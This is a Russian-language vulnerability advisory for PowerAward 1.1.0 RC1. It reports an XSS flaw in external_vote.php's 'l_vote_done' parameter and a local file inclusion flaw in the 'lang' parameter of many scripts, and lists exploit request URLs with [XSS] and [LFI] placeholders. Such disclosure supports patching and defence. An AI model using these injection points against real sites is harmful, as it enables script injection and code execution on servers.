Программа: PowerAward 1.1.0 RC1
Уязвимость позволяет удаленному пользователю выполнить произвольный сценарий
и осуществить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметре «l_vote_done» сценарием
external_vote.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://localhost/path/external_vote.php?l_vote_done=[XSS]
Уязвимость существует из-за недостаточной обработки входных данных в
параметре «lang» множественными сценариями. Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.
Эксплоит:
http://localhost/path/agb.php?lang=[LFI]
http://localhost/path/angemeldet.php?lang=[LFI]
http://localhost/path/anmelden.php?lang=[LFI]
http://localhost/path/charts.php?lang=[LFI]
http://localhost/path/external_vote.php?lang=[LFI]
http://localhost/path/guestbook.php?lang=[LFI]
http://localhost/path/impressum.php?lang=[LFI]
http://localhost/path/index.php?lang=[LFI]
http://localhost/path/rss-reader.php?lang=[LFI]
http://localhost/path/statistic.php?lang=[LFI]
http://localhost/path/teilnehmer.php?lang=[LFI]
http://localhost/path/topsites.php?lang=[LFI]
http://localhost/path/votecode.php?lang=[LFI]
http://localhost/path/voting.php?lang=[LFI]
http://localhost/path/winner.php?lang=[LFI]
